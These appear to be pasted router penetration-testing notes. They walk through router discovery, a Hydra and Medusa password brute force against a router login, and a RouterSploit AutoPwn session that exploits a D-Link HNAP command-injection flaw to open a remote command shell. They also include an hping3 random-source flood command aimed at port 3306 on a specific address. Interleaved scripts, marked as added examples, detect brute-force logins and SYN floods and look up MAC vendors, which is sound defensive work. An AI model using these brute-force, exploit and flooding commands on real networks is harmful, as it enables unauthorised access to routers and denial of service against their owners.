viprajput

G2$2

Jul 3rd, 2018
Router Penetration Testing
===========================

A router is the central connecting device of a network: it provides connectivity to all the end devices and nodes as well as to the network components of that particular network. Router pentesting is the process in which a network auditor cross-checks every applicable information gathering and exploitation method against the router. The goal of router pentesting is to establish the scope of the network by identifying the total number of access points and, for each router, its MAC address, model number, vendor name and firmware version.

There are two types of attacking procedures for that:

Active Router Attack : In this attack we attack the router's IP directly (mostly 192.168.0.1 or 192.168.1.1), trying to halt the services in the network and to get the juicy data out of the router.
Eg. Credentials brute force attack, WiFi jammer etc. on public networks


Passive Router Attack : In this attack we do not engage the router in the process; instead we work with the broadcast packet data generated by the router. The attack does not go directly to the router, but the attacker can use the data that originates from, or passes through, the router.
Eg. Sniffing and monitoring the WiFi traffic, doing MITM and other things.

Attack Vectors
Information Gathering of the Router :
When connected to the network :
Terminal : route -n
Terminal : netdiscover -r 192.168.0.1/24
(This can be used for getting the MAC address of the router)
When we have the MAC address, https://www.macvendorlookup.com/ can be used for getting the vendor name.

How to find out more about the router vendor : (when the MAC address is spoofed)

airmon-ng start wlan0
airodump-ng -M --bssid <router BSSID> -c <channel> wlan0mon   (Big Window; -M adds the manufacturer column from the OUI list)

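The vendor lookup above works because the first three octets of a MAC address (the OUI) are registered to a manufacturer. The following script is an added example, not part of the original notes and not code from macvendorlookup.com: it normalises the address formats you meet in `route -n`, `netdiscover` and Cisco-style output, looks the OUI up in a small table (the table entries are constructed assumptions, not the IEEE registry), and also reports the locally-administered bit, which is the first thing to check before trusting a vendor result, since a spoofed or randomised address is usually flagged there.

```python
import re

# Constructed OUI table for the demo: the first three octets of a MAC address
# (the OUI) identify the hardware vendor. A real lookup uses the IEEE OUI
# registry or a service such as macvendorlookup.com; these two entries are
# assumptions, not copied from the registry.
OUI_TABLE = {
    "00:1A:2B": "Vendor-A (constructed)",
    "3C:4D:5E": "Vendor-B (constructed)",
}

_NON_HEX = re.compile(r"[^0-9A-Fa-f]")


def normalize_mac(mac: str) -> str:
    """Accept 00-1a-2b-3c-4d-5e, 001a.2b3c.4d5e or 001A2B3C4D5E; return AA:BB:CC:DD:EE:FF."""
    digits = _NON_HEX.sub("", mac).upper()
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def oui_of(mac: str) -> str:
    """The OUI is the first three octets of the normalised address."""
    return normalize_mac(mac)[:8]


def is_locally_administered(mac: str) -> bool:
    """U/L bit (0x02 of the first octet): set on software-assigned (spoofed or
    randomised) addresses, clear on burned-in addresses."""
    return bool(int(normalize_mac(mac)[:2], 16) & 0x02)


def is_multicast(mac: str) -> bool:
    """I/G bit (0x01 of the first octet): set on multicast and broadcast addresses."""
    return bool(int(normalize_mac(mac)[:2], 16) & 0x01)


def lookup_vendor(mac: str, table=OUI_TABLE) -> dict:
    """Return the vendor for a MAC plus the flags that explain why a lookup can fail."""
    norm = normalize_mac(mac)
    local = is_locally_administered(norm)
    # A locally administered address was assigned by software, so its OUI does
    # not point at a manufacturer even if the prefix happens to be in the table.
    vendor = None if local else table.get(norm[:8])
    return {
        "mac": norm,
        "oui": norm[:8],
        "vendor": vendor,
        "locally_administered": local,
        "multicast": is_multicast(norm),
    }


if __name__ == "__main__":
    for sample in ("00-1a-2b-3c-4d-5e", "02:1A:2B:3C:4D:5E", "aabb.ccdd.eeff"):
        print(lookup_vendor(sample))
```

When `locally_administered` is true the vendor field is left empty on purpose: that is exactly the "MAC address is spoofed" case the notes mention, where the airodump-ng manufacturer column will be equally uninformative and the device has to be identified from its beacons and traffic instead.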
-----------------------------------------------------------------


Default router password lists :
http://192-168-1-1ip.mobi/default-router-passwords-list/
http://www.routerpasswords.com/
https://www.bestvpn.com/default-router-login-details/


Brute Forcing on Default Credentials :
Default credentials are those which have not been changed since the purchase of the router itself; these are the router login page credentials.
Mostly the username is just Admin.

For brute forcing we are going to use some advanced brute force tools which are pre-installed in Kali Linux.
Tools : Hydra, Medusa, Xhydra, Burpsuite

Attacking Methods:

Hydra : #hydra -l Admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get

Here, -l : username, -P : password list, where we put a dictionary of credentials (rockyou.txt), http-get / http-post : way of transmission of the data, 192.168.0.1 : default router IP address.

Medusa : #medusa -h 192.168.0.1 -u Admin -P <dictionary file> -M http

Here, -h : target IP address, -u : username, -P : password list, here we can embed a dictionary of credentials, -M : method of transmission (module)


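A dictionary attack like the Hydra and Medusa runs above leaves a very recognisable trace on the router side: a burst of failed logins for one username from one source, sometimes followed by a success once the wordlist hits. The detector below is an added example for the defender, not part of the original notes and not code from Hydra or Medusa; it assumes a syslog-like line format for the router's web server (real routers vary, so `LOG_RE` would need adjusting) and works over constructed log lines embedded in the script.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed router web-server log lines (syslog-like; the format is an
# assumption, real routers vary). Source 192.168.0.23 fails six times in
# ten seconds and then logs in; 192.168.0.40 fails twice, minutes apart;
# 192.168.0.10 logs in cleanly. One garbage line shows that unparseable
# input is skipped rather than crashing the detector.
SAMPLE_LOG = """\
2018-07-03T10:15:01 router httpd: login failed user=admin from=192.168.0.23
2018-07-03T10:15:03 router httpd: login failed user=admin from=192.168.0.23
2018-07-03T10:15:05 router httpd: login failed user=admin from=192.168.0.23
2018-07-03T10:15:07 router httpd: login failed user=admin from=192.168.0.23
2018-07-03T10:15:09 router httpd: login failed user=admin from=192.168.0.23
2018-07-03T10:15:11 router httpd: login failed user=admin from=192.168.0.23
2018-07-03T10:15:13 router httpd: login ok user=admin from=192.168.0.23
2018-07-03T10:20:00 router httpd: login failed user=admin from=192.168.0.40
this line is not a login event
2018-07-03T10:25:00 router httpd: login failed user=admin from=192.168.0.40
2018-07-03T10:30:00 router httpd: login ok user=admin from=192.168.0.10
""".splitlines()

LOG_RE = re.compile(
    r"^(?P<ts>\S+) \S+ httpd: login (?P<result>failed|ok) "
    r"user=(?P<user>\S+) from=(?P<src>\S+)$"
)


def parse_line(line):
    """Return {'ts', 'result', 'user', 'src'} for a login event, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag sources with >= threshold failed logins inside a sliding time window.

    A later successful login from a flagged source is recorded separately,
    because that is the pattern of a dictionary attack that found the password.
    """
    recent = defaultdict(deque)   # src -> timestamps of failures still inside the window
    alerts = {}                   # src -> alert record
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        src, ts = ev["src"], ev["ts"]
        if ev["result"] == "failed":
            q = recent[src]
            q.append(ts)
            while q and ts - q[0] > window:   # drop failures that aged out of the window
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(src, {"src": src, "user": ev["user"], "failures": 0,
                                            "first": q[0], "last": ts,
                                            "success_after_burst": False})
                a["failures"] = max(a["failures"], len(q))
                a["last"] = ts
        elif src in alerts:
            alerts[src]["success_after_burst"] = True
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

With the defaults only 192.168.0.23 is reported, with `success_after_burst` set, which is the record that should trigger a credential reset; the two slow failures from 192.168.0.40 stay below the threshold unless the window is widened, which is the usual trade-off between catching throttled guessing and paging on typos.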

Routersploit Framework (RSF)
========================
It is a tool written in Python used for automating the process of router exploitation. It is not pre-installed in Kali Linux, so we have to get it from external sources.

Installation on Kali Linux (downloading steps) :
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Running Steps :

When the Routersploit Framework is on,
rsf > help   (for the help menu)
Global commands:
help - Print this help menu
use <module> - Select a module for usage
exec <shell command> <args> - Execute a command in a shell
search <search term> - Search for appropriate module
exit - Exit RouterSploit
rsf > use scanners/   (using scanners : will show the list of every scanner)
scanners/2wire_scan
scanners/billion_scan
scanners/huawei_scan
scanners/netcore_scan
scanners/tplink_scan
scanners/3com_scan
scanners/cameras_scan
scanners/ipfire_scan
scanners/netgear_scan
scanners/ubiquiti_scan
scanners/asmax_scan
scanners/cisco_scan
scanners/juniper_scan
scanners/netsys_scan
scanners/zte_scan
scanners/asus_scan
scanners/comtrend_scan
scanners/linksys_scan
scanners/routers_scan
scanners/zyxel_scan
scanners/autopwn
scanners/dlink_scan
scanners/misc_scan
scanners/shuttle_scan
scanners/belkin_scan
scanners/fortinet_scan
scanners/movistar_scan
scanners/technicolor_scan
scanners/bhu_scan
scanners/grandstream_scan
scanners/multi_scan
scanners/thomson_scan
rsf > use scanners/autopwn   (using the automatic search)
rsf (AutoPwn) > show options

Target options:

   Name      Current settings     Description
   ----      ----------------     -----------
   target                         Target IP address e.g. 192.168.1.1
   port      80                   Target port


Module options:

   Name      Current settings     Description
   ----      ----------------     -----------
   threads   8                    Number of threads


rsf (AutoPwn) >

rsf (AutoPwn) > set target 192.168.0.1
[+] {'target': '192.168.0.1'}
rsf (AutoPwn) > show options

Target options:

   Name      Current settings     Description
   ----      ----------------     -----------
   target    192.168.0.1          Target IP address e.g. 192.168.1.1
   port      80                   Target port


Module options:

   Name      Current settings     Description
   ----      ----------------     -----------
   threads   8                    Number of threads


rsf (AutoPwn) >


[*] Could not verify exploitability:
- exploits/routers/dlink/dsl_2740r_dns_change
- exploits/routers/dlink/dir_815_850l_rce
- exploits/routers/dlink/dsl_2640b_dns_change
- exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
- exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
- exploits/routers/shuttle/915wm_dns_change
- exploits/routers/billion/5200w_rce
- exploits/routers/cisco/catalyst_2960_rocem
- exploits/routers/cisco/secure_acs_bypass

[+] Device is vulnerable:
- exploits/routers/dlink/multi_hnap_rce

rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
rsf (D-Link Multi HNAP RCE) > show options

Target options:

   Name      Current settings     Description
   ----      ----------------     -----------
   target                         Target address e.g. http://192.168.1.1
   port      80                   Target Port


rsf (D-Link Multi HNAP RCE) > set target 192.168.0.1
[+] {'target': '192.168.0.1'}
rsf (D-Link Multi HNAP RCE) > show options

Target options:

   Name      Current settings     Description
   ----      ----------------     -----------
   target    http://192.168.0.1   Target address e.g. http://192.168.1.1
   port      80                   Target Port


rsf (D-Link Multi HNAP RCE) >
rsf (D-Link Multi HNAP RCE) > run
[*] Running module...
[*] Target might be vulnerable - it is hard to verify
[*] Invoking command loop...
[*] It is blind command injection, response is not available

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] Depending on the vulnerability, command's results might not be available.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

-----------------------------------------------------------------


DDOS

hping3 192.168.195.183 -c 100000000000 -d 999999999 --rand-source --flood -p 3306
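On the wire, a flood of the shape shown above is a very high rate of SYN-only segments towards one destination port, and with `--rand-source` almost every segment carries a different source address. The script below is an added example for the monitoring side, not part of the original notes and not hping3 code: it buckets SYN packets per second and destination port, flags buckets above a rate threshold, and uses the ratio of distinct sources to SYNs to tell a spoofed-source flood from a single noisy host. The packet records are constructed in the script (timestamp, source, destination, port, TCP flags), so it runs offline; in practice you would feed it the same fields from a flow export or a pcap.

```python
from collections import defaultdict


def make_sample_packets():
    """Constructed packet records (ts in seconds, src, dst, dport, TCP flags), not a capture.

    Second 1: 150 SYNs to 192.168.195.183:3306, each from a different source
              (the shape a random-source flood produces).
    Second 2: 120 SYNs to the same port from one host (no source spoofing).
    Plus the start of a normal handshake to port 80 from 192.168.0.23.
    """
    pkts = []
    for i in range(150):
        pkts.append({"ts": 1.0 + i / 150, "src": f"10.{i // 256}.{i % 256}.7",
                     "dst": "192.168.195.183", "dport": 3306, "flags": "S"})
    for i in range(120):
        pkts.append({"ts": 2.0 + i / 120, "src": "192.168.0.99",
                     "dst": "192.168.195.183", "dport": 3306, "flags": "S"})
    pkts += [
        {"ts": 1.2, "src": "192.168.0.23", "dst": "192.168.195.183", "dport": 80, "flags": "S"},
        {"ts": 1.3, "src": "192.168.0.23", "dst": "192.168.195.183", "dport": 80, "flags": "A"},
    ]
    return pkts


SAMPLE_PACKETS = make_sample_packets()


def syn_flood_windows(packets, rate_threshold=100, distinct_ratio=0.5):
    """Bucket SYN-only packets per (second, dst, dport) and flag flood windows.

    rate_threshold: SYNs per second per destination port that count as a flood.
    distinct_ratio: distinct sources / SYNs at or above which source spoofing
                    is suspected (a legitimate client retries from one address).
    """
    buckets = defaultdict(lambda: {"syn": 0, "sources": set()})
    for p in packets:
        if p["flags"] != "S":          # SYN without ACK: a new connection attempt
            continue
        b = buckets[(int(p["ts"]), p["dst"], p["dport"])]
        b["syn"] += 1
        b["sources"].add(p["src"])

    alerts = []
    for (sec, dst, dport), b in sorted(buckets.items()):
        if b["syn"] < rate_threshold:
            continue
        distinct = len(b["sources"])
        alerts.append({
            "second": sec, "dst": dst, "dport": dport,
            "syn": b["syn"], "distinct_sources": distinct,
            "spoofing_suspected": distinct / b["syn"] >= distinct_ratio,
        })
    return alerts


if __name__ == "__main__":
    for alert in syn_flood_windows(SAMPLE_PACKETS):
        print(alert)
```

The two flood buckets are handled differently downstream: the single-source one can be rate-limited or blocked at the source address, while the spoofed one cannot, which is why the response to a random-source SYN flood is SYN cookies or upstream filtering rather than an address blocklist.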